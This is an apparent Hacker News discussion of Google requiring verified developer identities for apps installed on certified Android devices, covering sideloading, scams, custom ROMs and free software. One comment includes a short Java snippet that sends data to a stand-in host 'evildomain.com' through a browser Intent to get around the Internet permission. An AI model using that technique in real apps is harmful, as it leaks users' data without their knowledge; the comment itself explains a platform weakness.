Also https://techcrunch.com/2025/08/25/google-will-require-develo... (from merged thread)
Official announcement 1: https://android-developers.googleblog.com/2025/08/elevating-...
Official announcement 2: https://developer.android.com/developer-verification
Play Console Help: https://support.google.com/googleplay/android-developer/answ...
> Verify your identity
> * You will need to provide and verify your personal details, like your legal name, address, email address, and phone number.
> * If you're registering as an organization, you'll also need to provide a D-U-N-S number and verify your organization's website.
> * You may also need to upload official government ID.
Only one of those three applies to organizations.
> A note for student and hobbyist developers: we know your needs are different from commercial developers, so we’re creating a separate type of Android Developer Console account for you.
Nothing about it says anything about having lighter requirements, just not going through a Play Console link. Even if the requirements end up being "lighter", the minimum will always be at least "link a Google account", which is already a massive privacy breach.
> It also doesn't prevent you from side loading.
It absolutely does. Quoting from Google:
> Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
https://android-developers.googleblog.com/2025/08/elevating-...
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (>>44765939 ), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
[1] >>41895718
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such a mountain of complexity that it seems like only a billion/trillion dollar big tech company can make an OS.
But then again, somebody called BS on browsers and we might have a good option soon in Ladybug!
https://developer.android.com/develop/connectivity/network-o...
It isn't possible to ban encryption, so the governments have to chip away at security and privacy using these techniques.
From: https://developer.android.com/developer-verification
"You may also need to upload official government ID."
This won't end well for Google or the governments involved when the people get so angry that they are forced to roll this back. Switch to an alternative phone OS.
"You'll need to prove you own your apps by providing your app package name and app signing keys."
That is capital-I Insane.
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
https://www.androidauthority.com/nexus-6p-lawsuit-2019-97547...
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
[1]: https://developer.apple.com/help/app-store-connect/manage-co...
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
[0] https://www.nytimes.com/2003/06/30/business/technology-a-saf...
Fairphone from the Netherlands is another https://www.fairphone.com/
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
For anyone else failing to resolve DNS for that domain: https://archive.is/q7w0x
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE");
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
https://www.androidauthority.com/nexus-6p-bootloop-fix-78930...
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
It does have an Android subsystem stuck on, but it's not necessary.
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
https://grapheneos.social/@GrapheneOS/115090818389369737
> "GrapheneOS doesn't include Google Mobile Services and the requirements for certification aren't relevant to us."
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
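The manifest check proposed in the comment above, sketched as an added example (not code from the thread or from any existing store app). It generalises the single-permission test to an allowlist and assumes the manifest has already been decoded to text XML (inside an APK it is stored in a binary XML encoding); `ALLOWED_PERMISSIONS`, `review` and the sample manifests are hypothetical and constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"

# Hypothetical store policy: the only permissions an app may request.
ALLOWED_PERMISSIONS = frozenset({"android.permission.INTERNET"})

# Both element names can request a permission, so both must be inspected.
PERMISSION_TAGS = ("uses-permission", "uses-permission-sdk-23")


def declared_permissions(manifest_xml: str) -> set:
    """Return every permission name requested by a decoded AndroidManifest.xml."""
    # The manifest comes from an untrusted site: refuse DTDs and entity
    # declarations outright instead of letting the XML parser expand them.
    if "<!DOCTYPE" in manifest_xml or "<!ENTITY" in manifest_xml:
        raise ValueError("DTD or entity declaration in manifest")
    root = ET.fromstring(manifest_xml)
    if root.tag != "manifest":
        raise ValueError("root element is not <manifest>")
    perms = set()
    for tag in PERMISSION_TAGS:
        for element in root.findall(tag):
            name = element.get(NAME_ATTR)
            if not name:
                raise ValueError(f"<{tag}> without android:name")
            perms.add(name)
    return perms


def review(manifest_xml: str, allowed=ALLOWED_PERMISSIONS) -> dict:
    """Fail closed: anything unparseable or outside the allowlist is rejected."""
    try:
        perms = declared_permissions(manifest_xml)
    except (ET.ParseError, ValueError) as exc:
        return {"accept": False, "reason": f"unreadable manifest: {exc}", "excess": []}
    excess = sorted(perms - set(allowed))
    if excess:
        return {"accept": False, "reason": "requests permissions outside policy",
                "excess": excess}
    return {"accept": True, "reason": "all requested permissions allowed", "excess": []}


# Constructed sample manifests (not taken from real apps).
GOOD_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="tld.site.notes">
  <uses-permission android:name="android.permission.INTERNET" />
  <application android:label="Notes" />
</manifest>"""

BAD_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="tld.site.duckshop">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.READ_SMS" />
  <uses-permission-sdk-23 android:name="android.permission.READ_CONTACTS" />
  <application android:label="Duck Shop" />
</manifest>"""

if __name__ == "__main__":
    for label, xml_text in (("good", GOOD_MANIFEST), ("bad", BAD_MANIFEST)):
        print(label, review(xml_text))
```

A check like this only covers what an app asks for in its manifest; it says nothing about what the code does with the permissions it is granted.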
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
If they have anything on the platform that is subject to the CRA, they are a distributor:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
And if what you want is a PDA that runs Linux, there are many options, e.g. https://www.clockworkpi.com/home-uconsole.
https://support.google.com/googleplay/android-developer/thre...
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
https://developer.sony.com/open-source/aosp-on-xperia-open-d...
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
It's a huge pain to set up initially, but it's smooth sailing after that. There's a good tutorial at https://melatonin.dev/blog/code-signing-on-windows-with-azur...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial (07 Feb 2024)
— https://www.channelnewsasia.com/singapore/google-android-dev...
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> DBS, UOB become latest banks to restrict access if unverified apps are found on customers' phones
> They are the latest banks in Singapore to do so – after OCBC and Citibank – amid a spate of malware scams targeting users of Android devices.
— https://www.channelnewsasia.com/singapore/dbs-uob-anti-scam-...
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
— https://www.straitstimes.com/singapore/74-year-old-man-loses...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
— https://www.channelnewsasia.com/business/anduril-secures-305...
> CNA Explains: Are Android devices more prone to malware and how do you protect yourself from scams?
> Why are scammers more likely to target Android users? How do you spot a fake app and what should you do if your device is infected by malware?
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Nearly 2,000 victims fell for Android malware scams, at least S$34.1 million lost in 2023
> In 2023, about 1,899 cases of Android malware scams were reported in Singapore. The average amount lost was about S$17,960.
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
— https://www.channelnewsasia.com/singapore/android-users-inst...
[1] https://grapheneos.org/donate
https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...
I already got a popup in the dashboard this morning
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
Longer discussion (opinion not sourced from AI though): https://chatgpt.com/share/68ad1084-eb74-8003-8f10-ca324b5ea8...
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
(I posted a couple years ago about this topic, admittedly it was a bit ranty: >>37774254 )
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSW's implementation seems OK I guess
You will need to boot to recovery mode, go through utility and enable it: https://support.apple.com/en-ca/guide/mac-help/mchl768f7291/...
Basically average users will never be able to pull this off.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
https://sfconservancy.org/copyleft-compliance/vizio.html
https://sfconservancy.org/blog/2021/mar/25/install-gplv2/
https://sfconservancy.org/blog/2021/jul/23/tivoization-and-t...
https://events19.linuxfoundation.org/wp-content/uploads/2017...
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
https://www.tomshardware.com/software/windows/microsoft-elim...
It's still possible to set up using only a local account, but who knows for how long.
Will once again re-up the concept of a “right to root access”, to prevent big corps from pulling this bs over and over again: https://medhir.com/blog/right-to-root-access
Yes, I've cherry picked from the minority of countries with near or over half iOS market share. But, they're all high GDP countries with a very valuable customer base. Apple and Google care about these markets, they don't care about global market share.
[1] https://gs.statcounter.com/os-market-share/mobile/australia
[2] https://gs.statcounter.com/os-market-share/mobile/united-sta...
[3] https://gs.statcounter.com/vendor-market-share/mobile/united...
[4] https://gs.statcounter.com/os-market-share/mobile/japan
[5] https://gs.statcounter.com/vendor-market-share/mobile/canada
[6] https://gs.statcounter.com/os-market-share/mobile/denmark
[7] https://gs.statcounter.com/os-market-share/mobile/switzerlan...
[8] https://gs.statcounter.com/os-market-share/mobile/sweden
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identify and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
[0] - https://www.abm.org.my/press-releases/banks-to-enable-malwar...
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
[1]: https://gpslogger.app/ [2]: https://github.com/mendhak/gpslogger/issues/849
They’ll try again, with big business and governments cheering on them.
If there's enough interest in US, then they may release it there, too.
https://www.electronforge.io/guides/code-signing/code-signin...
If you agree that above are edge cases too, I have a Volkswagen to sell you [0].
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a vlog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen. Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
Weird apps that block your phone and show ads constantly (yes this exists)
Typosquatting apps
Apps that hold your phone for ransom if you don't pay a certain debt (yes this exists) https://www.welivesecurity.com/en/eset-research/beware-preda...
It does require the developer to make minor adjustments, and most banks are simply too risk averse to agree to doing that (I would know, used to be a senior android app dev at a bank).
[0]: https://grapheneos.social/@GrapheneOS/115062761036828110
I think his take on what compromises are valid and what aren't makes this clear: https://www.gnu.org/philosophy/compromise.en.html
In fact, this particular incident, re Android, a seemingly "open" system, is a perfect example of the importance of his PoV in particular, as it illustrates that Open Source ideology would not have been enough to ensure the user is in control.
https://www.zdfheute.de/wirtschaft/unternehmen/gmx-google-pl...
Rechtsprechung (court decision of LG Mainz, 22.08.2025, 12 HK O 32/24), text isn't published yet as of today:
https://dejure.org/dienste/vernetzung/rechtsprechung?Gericht...
If you search for the Aktenzeichen ("12 HK O 32/34") you'll find other news sources that confirm this.
Can’t be bypassed without root and otherwise all rom not official and validated by Google are on time watch.
https://android-developers.googleblog.com/2024/12/making-pla...
Ask yourself how come free software is everywhere, with licenses for various stuff neatly tucked away out of sight unless you're trying to find it, not to mention all the giant clusters of Linux machines in data centers running Samba, PostgreSQL, and all sorts of free software, and at the same time the FSF still has just a small apartment on the 5th floor of a building in Boston?
Here, take a look: https://www.fsf.org/about/contact/tour-2010
I love GrapheneOS but they can only thrive if Google tolerate them. So in its current form, this is not a medium or long term solution (anymore).
We really cannot afford to think in terms of "Android OS" or open source OS anymore the problem is getting much bigger.
My guess is soon in many "free" countries, ISP will mandate connecting with a "Certified" device (someone was saying that in Brazil only cell phones certified by the teleco government agency can be imported already). And on mobile it is easy to implement since you need a (e)SIM. The Internet is still hard to control at the protocol level, but the gates are easy to mostly control (your ISP).
In terms of mobile computing I mostly care about being able to access my home network from the places I am 80% of the time (and I can always bridge to the Internet from there). So the real battle is really at the mesh and multi-hop mobile ad hoc networks. This is the aspect we neglected for 25 years.
Regarding mobile, the battle for Android is lost, time to look into things like B.A.T.M.A.N [0] so we'll be able to keep another open source mobile platform useful.
For anything "money" related, your bank (which is inevitably regulated) will have to mandate a certified device too. It will work on (some) Linux too.
Ever wondered why for example the Fedora project [1] is proudly part of things like The Digital Public Goods Alliance [2] who works with many govs and if you really look into it they are all about digital ids and "restoring trust"?
- [0] https://www.open-mesh.org/projects/open-mesh/wiki
Having heard so much about anti-Tivoization when the GPLv3 was being drafted, and the discussions about it on linux-kernel when Linus decided the kernel will remain GPLv2-only, I was left with the impression that the GPLv2 only required the provision of source code, build scripts, etc. but not the ability to reinstall a new version. [1] makes a pretty good case that the ability to reinstall is also required by GPLv2, and I'm heartened that's how Tivo saw it too.
[1] https://sfconservancy.org/blog/2021/jul/23/tivoization-and-t...
https://www.fsf.org/about/contact/
> As of September 1, 2024, we have gone remote and no longer have an office for people to visit.
IIRC they moved somewhere else in the interim.
Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?
What’s stopping us from making this a reality? We have passionate FOSS developers and visionary leaders capable of championing this cause and building a strong community around it.
I had high hopes for Mark Shuttleworth’s Ubuntu Phone. Unfortunately, after the Kickstarter campaign fell through, development stalled. I still believe consumers missed out on a remarkable piece of technology.
That said, I see Ubuntu Touch[1] is still active, though I’m unclear on its current impact or progress. Meanwhile, Smart TVs and smartphones continue to be dominated by Google’s Android OS.
FOSS/Linux has had many attempts at phones, but they need one good leader to do it, which is very hard unless someone with name recognition gets everyone to work on one project.
> The problem includes the actual control of how services are provided.
FSF has opinions about SaaS which they call SaaSS (Service as a Software Substitute).
https://www.gnu.org/philosophy/who-does-that-server-really-s...
https://9to5mac.com/2024/10/17/developers-address-phone-numb...
The same thing was applied to the Apple store at the same time.
This is a plot twist I never thought would happen. While the EU [1], Japan [2], UK [3] and Australia [4] are in the process of forcing Apple to allow sideloading and alternative App Stores, Google, which was far from these obligations, has taken a totally unexpected road to limit/control how sideloading should work.
____________________
1. https://developer.apple.com/support/dma-and-apps-in-the-eu/
2. https://www.phonearena.com/news/the-world-is-changing-japan-...
3. https://www.videogameschronicle.com/news/uk-passes-bill-whic...
4. https://www.theguardian.com/technology/2025/jun/06/australia...
Those same users can now install facebook, and facebook does this: https://medium.com/@ak123aryan/facebooks-hidden-android-trac...
And facebook is and will be verified in the future too.
They have the right to use cash, even if the vendor chooses not to accept it.
I learned this by trying to pay a fine with coins, which are NOT legal tender like cash is.
https://en.m.wikipedia.org/wiki/Legal_tender
> Each jurisdiction determines what is legal tender, but essentially it is anything which, when offered ("tendered") in payment of a debt, extinguishes the debt. There is no obligation on the creditor to accept the tendered payment, but the act of tendering the payment in legal tender discharges the debt.
Amazon's "Kindle" tablets and TV devices famously do not ship Google apps, and sometimes you see restricted devices like the Rabbit R1 that just use the open-source parts of Android. But outside of China I don't think you can easily walk into a store and find a non-Google Android phone.
I don't think phones ever officially lapse out of Play Protect certified status -- the Nexus One, a phone from 2010, is still listed -- but presumably it'd be possible to find a phone old enough that it won't be able to download whatever Play Services OTA update they'll use to push this change.
Not at all, that's why there are separate terms! GNU has an article that's worth reading: https://www.gnu.org/philosophy/open-source-misses-the-point....
I'll point out a very practical case. I was once-upon-a-time interested in Nostr, because I liked the relay idea. I looked for a client, and found one called Amethyst. When I installed it, I saw the author had inserted a pop-up on load that had me agreeing to his "Terms and Conditions" for using "the service". But the author had no service...he was worried about his liability if I posted something. Stallman saw this coming! From the article above:
> Third, the criteria for open source are concerned solely with the use of the source code. Indeed, almost all the items in the Open Source Definition are formulated as conditions on the software's source license rather than on what users are free to do. However, people often describe an executable as “open source,” because its source code is available that way. That causes confusion in paradoxical situations where the source code is open source (and free) but the executable itself is nonfree.
> The trivial case of this paradox is when a program's source code carries a weak free license, one without copyleft, but its executables carry additional nonfree conditions. Supposing the executables correspond exactly to the released sources—which may or may not be so—users can compile the source code to make and distribute free executables. That's why this case is trivial; it is no grave problem.
And this is _exactly_ the argument the author of Amethyst makes, check out how he reasons through the additional restrictions: https://github.com/vitorpamplona/amethyst/issues/378
His reasoning is squarely in this weird zone that Stallman wrote about:
> I am confused. Why are we mixing the license with the terms of use? These two files are separate legal matters. The Privacy is used by the Play Store to manage the distribution of the executables. The MIT license relates to the source code only.
> In other words, the MIT license removes any author liability from the misuse of the code. But when the author is also providing the system as binaries (which is an additional service in every jurisdiction I know of), there are many other legal issues that the source code license won't cover.
> And I don't know about you, but I am not comfortable allowing people to use the Play Store version or the FDroid version for these activities written in the Privacy statement. Most of them are local crimes that should not happen anyway.
> This has nothing to do with the source code license, which people can still download, compile and use in nefarious ways.
Anyway, my point is, in practice, there's a million ways to water down "open source" to remove user freedoms, and the value of Free Software is that it keeps the focus in the right place to avoid falling victim to those tricks.
https://www.androidheadlines.com/2025/07/eu-age-verification...
Since there are no viable alternatives, I guess it's time to go back to owning a cheap corporate/government approved phone for official business (i.e. banking), and another one that I actually use.
As an aside, the presentation[0] doesn't really go into the details how they will enforce this (on-device? Remotely? If the latter, can I just remove Play Services from my device to sideload whatever?), but you can apparently submit feedback about the verification process here[1].
[0]: https://goo.gle/play-console-android-developer-verification
[1]: https://docs.google.com/forms/d/e/1FAIpQLSdpZbsJCS-f7CtMbZPn...
That's news to me! But no. Open source philosophy isn't free software stripped of its ethics question. I have written an essay/article/novel/epic here: >>45027202
Knox sounds like a pretty awesome feature though.
I use `nix-on-droid` on a Pixel 9 running stock Android 16. It provides me with a nix shell that gives me ZSH, Starship prompt, NeoVim, w3m, ssh, alpine, Claude-code, Circumflex (TUI HackerNews Client) and just about anything else I want from the Nix packages ecosystem. I even have NUR (Nix User Repositories) set up. I daily drive NixOS for work and for pleasure. It's the most advanced operating system I've ever encountered. I can't wax enough praise.
The closest thing to a truly open source, fully functional and daily used mobile that I ever had was the Nokia N900. Man how I miss that thing. Maemo was Nokia's original Linux-based mobile OS, which ran on the N900/950.
MeeGo was created when Nokia merged Maemo with Intel's Moblin project around 2010. It was supposed to be the future of Nokia smartphones, but Nokia abandoned it in 2011 when they switched to Windows Phone as their primary smartphone platform. Idiots.
Mer was created as an open-source continuation of MeeGo after Nokia dropped it.
Sailfish OS was then built on top of Mer by Jolla, a company founded by former Nokia employees who had worked on MeeGo.
Jolla launched in 2013 with the goal of continuing the Linux mobile vision that Nokia had abandoned. They make phones and tablets.
[0]: https://en.wikipedia.org/wiki/Web_Environment_Integrity
I hate how this always gets brought up because:
1. Evil has no definition, so it means nothing. They get to define what evil is for themselves. They stated their reasons they think this change is good. You can't prove it breaks their code of conduct.
2. It's straight up false, it's still in their code of conduct:
> And remember... don’t be evil, and if you see something that you think isn’t right – speak up!
https://www.gnu.org/philosophy/free-sw.html#four-freedoms
Quote below:
The four essential freedoms
A program is free software if the program's users have the four essential freedoms: [1]
The freedom to run the program as you wish, for any purpose (freedom 0).
The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this.
The freedom to redistribute copies so you can help others (freedom 2).
The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this.
A simple google search away.
> I could see that this is also an issue for scam apps.
I don't deny that it can be used to reduce scams, but I think there are far better ways to solve this that don't give authoritarian countries extra powers. Thing is, signing doesn't actually address the problem. It is a way to track the problem, not prevent the problem. Don't confuse the two.
> Firefox for instance does not allow you to install unsigned extensions.
That's absolutely not true[0]. You need to sign the extension to publish it to their app store but you don't need it to install. Btw, the Playstore already does this too. Which I'm totally okay with!
[0] https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
For other people to use your extension, you need ***to package it and submit it to Mozilla*** for signing.
The computer owner in (a) is not creating "malware". Any arguments that "verification" is for the protection of users (not commercial benefit of Google) are inapplicable in (a). Unlike the software in (b) the software in (a) only runs on the computer owner's computer, not anyone else's computer. There is no need in the case of (a) for Google to know about what software is running on the computer owner's computer.^1 Surely Google would agree there is no need, i.e., no right, for a computer owner seeking "verification" to know what software is running on Google's computers or the identities of Google employees.
1. None that outweighs the owner's right to privacy. Microsoft, Apple and Google all use _default_ telemetry
https://gist.github.com/alirobe/7f3b34ad89a159e6daa1
https://github.com/cedws/apple-telemetry
https://apple.stackexchange.com/questions/437068/eliminating...
https://therecord.media/google-collects-20-times-more-teleme...
https://www.theregister.com/2025/08/26/apps_android_malware/
https://arstechnica.com/security/2024/09/11-million-devices-...
https://www.cpomagazine.com/cyber-security/over-300-maliciou...
Not sure which numbers you are expecting, but 90 million downloads combined isn’t insignificant.
https://extensionworkshop.com/documentation/publish/signing-...
You can temporarily install extensions in about:debugging, but everything permanent needs to be signed.
> Add-ons need to be signed before they can be installed into release and beta versions of Firefox. This signing process takes place through addons.mozilla.org (AMO), whether you choose to distribute your add-on through AMO or to do it yourself.
That means, we have to do it ourselves. The first thing we can do is write to our MEPs. All of them. Thankfully, x775 has made a website in protest to the EU chat control law that makes finding your MEPs' e-mail addresses really easy, so maybe we can just take advantage of their work and use it to frame our own request. The relevant HN post is here: >>44858504
Could this be a way forward???
[0] https://www.zdfheute.de/wirtschaft/unternehmen/gmx-google-pl... in German, I'm afraid
[0] >>45033035
[1] >>45035699
